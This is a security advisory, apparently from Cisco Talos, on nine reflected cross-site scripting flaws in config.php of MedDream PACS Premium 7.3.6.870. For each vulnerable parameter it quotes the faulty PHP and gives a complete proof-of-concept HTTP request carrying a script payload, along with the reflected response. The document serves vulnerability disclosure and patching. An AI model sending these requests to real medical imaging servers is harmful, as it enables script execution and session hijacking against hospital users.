CVE-2025-58089,CVE-2025-58093,CVE-2025-58090,CVE-2025-58091,CVE-2025-58088,CVE-2025-58087,CVE-2025-58094,CVE-2025-58095,CVE-2025-58092
Multiple reflected cross-site scripting (xss) vulnerabilities exist in the config.php functionality of MedDream PACS Premium 7.3.6.870. Specially crafted malicious URLs can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger these vulnerabilities.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
MedDream PACS Premium 7.3.6.870
MedDream PACS Premium - https://meddream.com/products/meddream-pacs-server/
6.1 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE-79 - Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
MedDream PACS is a DICOM 3.0-compliant server for storing, managing, and retrieving medical images. It includes a web-based DICOM viewer and administration interface, with features like user access control, study forwarding, and multi-format image support.
Multiple reflected XSS vulnerabilities exist in the config.php script.
The value of the status parameter used in that script is written into the HTML output without any sanitization. The vulnerable code appears as follows:
/// line 570
require_once 'header.php';
if (isset($_GET['status'])) {
print "<p><font color='$BGCOLOR'>";
print urldecode($_GET['status']);
print "</font>";
}
The status parameter, which is fully controllable by an attacker, is printed directly into the web page content [1].
Example of a malicious request and response containing injected HTML/JavaScript code:
REQ
GET /Pacs/config.php?status=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1
Host: 192.168.0.42
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: sessionCookie=%DC%07%E5Rlp%1B%AA%B8%E6%BE%F3n%FA%E9%97%C70%84%EE%D2%91x%8E%40F%12u%8D%E7%EC%5C; PHPSESSID=d92c6a70310515c9c11b928a9fb86bee; MEDDREAMSESSID=89F9D14757A096B63E147238A622FC72
Upgrade-Insecure-Requests: 1
Priority: u=0, i
RESP
HTTP/1.1 200 OK
Date: Tue, 19 Aug 2025 12:36:55 GMT
Server: =^_^=
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Powered-By: PHP/8.3.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=(), camera=()
Content-Length: 21136
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
(...)
<font color='#383842'><script>alert(1)</script></font>
The value of the archivedir parameter used in that script is written into the HTML output without any sanitization. The vulnerable code appears as follows:
// line 70
if (isset($_POST['update'])) {
global $BGCOLOR;
(...)
// default short-term archive directory
if (isset($_POST['archivedir']) && strlen($_POST['archivedir'])) {
$dir = cleanPostPath($_POST['archivedir']); /// [1]
if (!file_exists($dir)) {
print "<h3><font color=red>";
printf(pacsone_gettext("Default Short-Term Archive Directory %s does not exist!"), $dir); /// [2]
print "</font></h3>";
exit();
}
The $dir variable, which is fully controllable by an attacker [1], is printed directly into the web page content [2] if pointed by $dir directory does not exist.
Example of a malicious request and response containing injected HTML/JavaScript code:
POST /Pacs/config.php HTTP/1.1
Host: 192.168.0.42
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.0.42/Pacs/series.php?patientId=D97258%2F11053&studyId=1.3.12.2.1107.5.4.3.11540117440512.19970422.140030.45
Connection: keep-alive
Cookie: sessionCookie=%DC%07%E5Rlp%1B%AA%B8%E6%BE%F3n%FA%E9%97%C70%84%EE%D2%91x%8E%40F%12u%8D%E7%EC%5C; PHPSESSID=d92c6a70310515c9c11b928a9fb86bee; MEDDREAMSESSID=89F9D14757A096B63E147238A622FC72
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
update=123&archivedir=<script>alert(1)</script>
RESP
HTTP/1.1 200 OK
Date: Tue, 19 Aug 2025 12:59:23 GMT
Server: =^_^=
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Powered-By: PHP/8.3.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=(), camera=()
Content-Length: 4158
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
...
<div id="content">
<h3><font color=red>Default Short-Term Archive Directory <script>alert(1)</script> does not exist!</font></h3>
The value of the longtermdir parameter used in that script is written into the HTML output without any sanitization. The vulnerable code appears as follows:
//line 107
// default long-term archive directory
if ($_POST['awss3'] || (isset($_POST['longtermdir']) && strlen($_POST['longtermdir']))) {
$dir = cleanPostPath($_POST['longtermdir']); /// [1]
(...)
} else if (!file_exists($dir)) {
print "<h3><font color=red>";
printf(pacsone_gettext("Default Long-Term Archive Directory %s does not exist!"), $dir); /// [2]
print "</font></h3>";
exit();
}
The longtermdir parameter, which is fully controllable by an attacker [1], is printed directly into the web page content [2] if pointed by $dir directory does not exist.
Example of a malicious request and response containing injected HTML/JavaScript code:
POST /Pacs/config.php HTTP/1.1
Host: 192.168.0.42
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.0.42/Pacs/series.php?patientId=D97258%2F11053&studyId=1.3.12.2.1107.5.4.3.11540117440512.19970422.140030.45
Connection: keep-alive
Cookie: sessionCookie=%DC%07%E5Rlp%1B%AA%B8%E6%BE%F3n%FA%E9%97%C70%84%EE%D2%91x%8E%40F%12u%8D%E7%EC%5C; PHPSESSID=d92c6a70310515c9c11b928a9fb86bee; MEDDREAMSESSID=89F9D14757A096B63E147238A622FC72
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
update=123&longtermdir=<script>alert(1)</script>
RESP
HTTP/1.1 200 OK
Date: Tue, 19 Aug 2025 13:19:38 GMT
Server: =^_^=
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Powered-By: PHP/8.3.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=(), camera=()
Content-Length: 4157
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
(...)
<div id="content">
<h3><font color=red>Default Long-Term Archive Directory <script>alert(1)</script> does not exist!</font></h3>
The value of the uploaddir parameter used in that script is written into the HTML output without any sanitization. The vulnerable code appears as follows:
/// line 142
// store attachment under the following upload directory
if (isset($_POST['uploaddir']) && strlen($_POST['uploaddir'])) {
$dir = cleanPostPath($_POST['uploaddir']); /// [1]
if (!file_exists($dir)) {
print "<h3><font color=red>";
printf(pacsone_gettext("Upload Directory %s does not exist!"), $dir); /// [2]
print "</font></h3>";
exit();
}
The $dir variable, which is fully controllable by an attacker [1], is printed directly into the web page content [2] if pointed by $dir directory does not exist.
Example of a malicious request and response containing injected HTML/JavaScript code:
POST /Pacs/config.php HTTP/1.1
Host: 192.168.0.42
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.0.42/Pacs/series.php?patientId=D97258%2F11053&studyId=1.3.12.2.1107.5.4.3.11540117440512.19970422.140030.45
Connection: keep-alive
Cookie: sessionCookie=%DC%07%E5Rlp%1B%AA%B8%E6%BE%F3n%FA%E9%97%C70%84%EE%D2%91x%8E%40F%12u%8D%E7%EC%5C; PHPSESSID=d92c6a70310515c9c11b928a9fb86bee; MEDDREAMSESSID=89F9D14757A096B63E147238A622FC72
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
update=123&uploaddir=<script>alert(1)</script>
RESP
HTTP/1.1 200 OK
Date: Tue, 19 Aug 2025 13:46:12 GMT
Server: =^_^=
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Powered-By: PHP/8.3.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=(), camera=()
Content-Length: 4138
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
(...)
<div id="content">
<h3><font color=red>Upload Directory <script>alert(1)</script> does not exist!</font></h3>
The value of the thumbnaildir parameter used in that script is written into the HTML output without any sanitization. The vulnerable code appears as follows:
// line 161
if (isset($_POST['thumbnaildir'])) {
if (strlen($_POST['thumbnaildir'])) {
$dir = cleanPostPath($_POST['thumbnaildir']); /// [1]
if (!file_exists($dir)) {
print "<h3><font color=red>";
printf(pacsone_gettext("Thumbnails Directory %s does not exist!"), $dir); /// [2]
print "</font></h3>";
exit();
}
The $dir variable, which is fully controllable by an attacker [1], is printed directly into the web page content [2] if pointed by $dir directory does not exist.
Example of a malicious request and response containing injected HTML/JavaScript code:
REQ
POST /Pacs/config.php HTTP/1.1
Host: 192.168.0.42
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.0.42/Pacs/series.php?patientId=D97258%2F11053&studyId=1.3.12.2.1107.5.4.3.11540117440512.19970422.140030.45
Connection: keep-alive
Cookie: sessionCookie=%DC%07%E5Rlp%1B%AA%B8%E6%BE%F3n%FA%E9%97%C70%84%EE%D2%91x%8E%40F%12u%8D%E7%EC%5C; PHPSESSID=d92c6a70310515c9c11b928a9fb86bee; MEDDREAMSESSID=89F9D14757A096B63E147238A622FC72
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
update=123&thumbnaildir=<script>alert(1)</script>
RESP
HTTP/1.1 200 OK
Date: Tue, 19 Aug 2025 13:48:20 GMT
Server: =^_^=
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Powered-By: PHP/8.3.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=(), camera=()
Content-Length: 4142
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
(...)
<div id="content">
<h3><font color=red>Thumbnails Directory <script>alert(1)</script> does not exist!</font></h3>
The value of the phpexe parameter used in that script is written into the HTML output without any sanitization. The vulnerable code appears as follows:
// line 215
// path to PHP runtime executable (php.exe)
if (isset($_POST['phpexe'])) {
$phpexe = cleanPostPath($_POST['phpexe']); // [1]
if (!file_exists($phpexe) || !is_executable($phpexe)) {
print "<h3><font color=red>";
printf(pacsone_gettext("%s does not exist"), $phpexe); /// [2]
print "</font></h3>";
exit();
}
The $phpexe variable, which is fully controllable by an attacker [1], is printed directly into the web page content [2] if pointed by $phpexe file does not exist or is not an executable file.
Example of a malicious request and response containing injected HTML/JavaScript code:
POST /Pacs/config.php HTTP/1.1
Host: 192.168.0.42
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.0.42/Pacs/series.php?patientId=D97258%2F11053&studyId=1.3.12.2.1107.5.4.3.11540117440512.19970422.140030.45
Connection: keep-alive
Cookie: sessionCookie=%DC%07%E5Rlp%1B%AA%B8%E6%BE%F3n%FA%E9%97%C70%84%EE%D2%91x%8E%40F%12u%8D%E7%EC%5C; PHPSESSID=d92c6a70310515c9c11b928a9fb86bee; MEDDREAMSESSID=89F9D14757A096B63E147238A622FC72
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
update=123&phpexe=<script>alert(1)</script>
RESP
HTTP/1.1 200 OK
Date: Tue, 19 Aug 2025 13:58:30 GMT
Server: =^_^=
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Powered-By: PHP/8.3.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=(), camera=()
Content-Length: 4120
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
(...)
<div id="content">
<h3><font color=red><script>alert(1)</script> does not exist</font></h3>
The value of the phpdir parameter used in that script is written into the HTML output without any sanitization. The vulnerable code appears as follows:
// line 435
// path to non-default or user-configured directory of PHP scripts
if (isset($_POST['phpdir'])) {
$phpdir = cleanPostPath($_POST['phpdir']); // [1]
if (strlen($phpdir) && !file_exists($phpdir)) {
print "<h3><font color=red>";
printf(pacsone_gettext("Directory %s does not exist or not accessible!"), $phpdir); // [2]
print "</font></h3>";
exit();
}
The $phpdir variable, which is fully controllable by an attacker [1], is printed directly into the web page content [2] if pointed by $phpexe directory does not exist.
Example of a malicious request and response containing injected HTML/JavaScript code:
POST /Pacs/config.php HTTP/1.1
Host: 192.168.0.42
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.0.42/Pacs/series.php?patientId=D97258%2F11053&studyId=1.3.12.2.1107.5.4.3.11540117440512.19970422.140030.45
Connection: keep-alive
Cookie: sessionCookie=%DC%07%E5Rlp%1B%AA%B8%E6%BE%F3n%FA%E9%97%C70%84%EE%D2%91x%8E%40F%12u%8D%E7%EC%5C; PHPSESSID=d92c6a70310515c9c11b928a9fb86bee; MEDDREAMSESSID=89F9D14757A096B63E147238A622FC72
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
update=123&phpdir=<script>alert(1)</script>
RESP
HTTP/1.1 200 OK
Date: Tue, 19 Aug 2025 14:14:14 GMT
Server: =^_^=
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Powered-By: PHP/8.3.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=(), camera=()
Content-Length: 4149
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
(...)
<div id="content">
<h3><font color=red>Directory <script>alert(1)</script> does not exist or not accessible!</font></h3>
The value of the worklistsrc parameter used in that script is written into the HTML output without any sanitization. The vulnerable code appears as follows:
$worklistscan = $_POST['worklistscan'];
$worklistsrc = cleanPostPath($_POST['worklistsrc']); /// [1]
if ($worklistscan) {
$ok = true;
if (!file_exists($worklistsrc)) {
print "<p><font color=red>";
printf(pacsone_gettext("Invalid Worklist Scan Source Directory: [%s]"), $worklistsrc); /// [2]
print "</font><p>";
$ok = false;
}
The $worklistsrc variable, which is fully controllable by an attacker [1], is printed directly into the web page content [2] if pointed by $worklistsrc directory does not exist.
Example of a malicious request and response containing injected HTML/JavaScript code:
POST /Pacs/config.php HTTP/1.1
Host: 192.168.0.42
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.0.42/Pacs/config.php?status=System+Configurations+Updated.
Content-Type: application/x-www-form-urlencoded
Content-Length: 1027
Origin: http://192.168.0.42
Connection: keep-alive
Cookie: sessionCookie=%DC%07%E5Rlp%1B%AA%B8%E6%BE%F3n%FA%E9%97%C70%84%EE%D2%91x%8E%40F%12u%8D%E7%EC%5C; PHPSESSID=d92c6a70310515c9c11b928a9fb86bee; MEDDREAMSESSID=89F9D14757A096B63E147238A622FC72
Upgrade-Insecure-Requests: 1
Priority: u=0, i
update=1&archivedir=C%3A%2F&archiveformat=0&longtermdir=&archiveage=0&age=0&agingwday=Sunday&aginghour=12%3A00+AM&agingwday2=Sunday&aginghour2=12%3A00+AM&autologout=10&passwordexpire=60&maxupload=2&skipseries=0&uploaddir=&attachment=table&thumbnaildir=&imagedir=&autoscan=0&scansrc=&scandest=&scaninterval=60&adminemail=&phpexe=C%3A%2FMDPACS%2FServer%2Fphp%2Fphp.exe&emailfailedjobs=1&worklistage=30&matchworklist=0&studyreconcil=0&worklistscan=abc&worklistsrc=%3cscript%3ealert(1)%3c%2fscript%3e&worklistinterval=60&dailyreport=on&weeklyreport=on&monthlyreport=on&journalreport=on&dateformat=US&datetimeformat=US&autoconvert=0&convertlimit=11&videoformat=0&webmargs=-cpu-used+5+-deadline+realtime&mp4args=&swfargs=&veterinary=1&charset=Default&wadosecmodel=0&wadousername=root&wadopassword=Test123&externalAccessUrl=&userfilter=0&ldapHost=&ldapPort=&ldap=0&customphp=0&customphpdhour=12%3A00+AM&customphpwday=Sunday&customphpwhour=12%3A00+AM&customphpmday=1&customphpmhour=12%3A00+AM&phpdir=&pthreadpoolsize=6&skipemptystudy=1
RESP
HTTP/1.1 200 OK
Date: Tue, 19 Aug 2025 15:09:26 GMT
Server: =^_^=
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Powered-By: PHP/8.3.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=(), camera=()
Content-Length: 4144
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
The value of the imagedir parameter used in that script is written into the HTML output without any sanitization. The vulnerable code appears as follows:
// line 181
// store generated jpg/gif images the following directory
if (isset($_POST['imagedir'])) {
if (strlen($_POST['imagedir'])) {
$dir = cleanPostPath($_POST['imagedir']); /// [1]
if (!file_exists($dir)) {
print "<h3><font color=red>";
printf(pacsone_gettext("Images Directory %s does not exist!"), $dir); ///[2]
print "</font></h3>";
exit();
}
The $dir variable, which is fully controllable by an attacker [1], is printed directly into the web page content [2] if pointed by $dir directory does not exist.
Example of a malicious request and response containing injected HTML/JavaScript code:
POST /Pacs/config.php HTTP/1.1
Host: 192.168.0.42
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.0.42/Pacs/series.php?patientId=D97258%2F11053&studyId=1.3.12.2.1107.5.4.3.11540117440512.19970422.140030.45
Connection: keep-alive
Cookie: sessionCookie=%DC%07%E5Rlp%1B%AA%B8%E6%BE%F3n%FA%E9%97%C70%84%EE%D2%91x%8E%40F%12u%8D%E7%EC%5C; PHPSESSID=d92c6a70310515c9c11b928a9fb86bee; MEDDREAMSESSID=89F9D14757A096B63E147238A622FC72
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
update=123&imagedir=<script>alert(1)</script>
RESP
HTTP/1.1 200 OK
Date: Tue, 19 Aug 2025 13:53:22 GMT
Server: =^_^=
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Powered-By: PHP/8.3.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=(), camera=()
Content-Length: 4138
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
(...)
<div id="content">
<h3><font color=red>Images Directory <script>alert(1)</script> does not exist!</font></h3>
2025-09-02 - Vendor Disclosure
2025-12-05 - Vendor Patch Release
2026-01-20 - Public Release
Discovered by Marcin 'Icewall' Noga of Cisco Talos.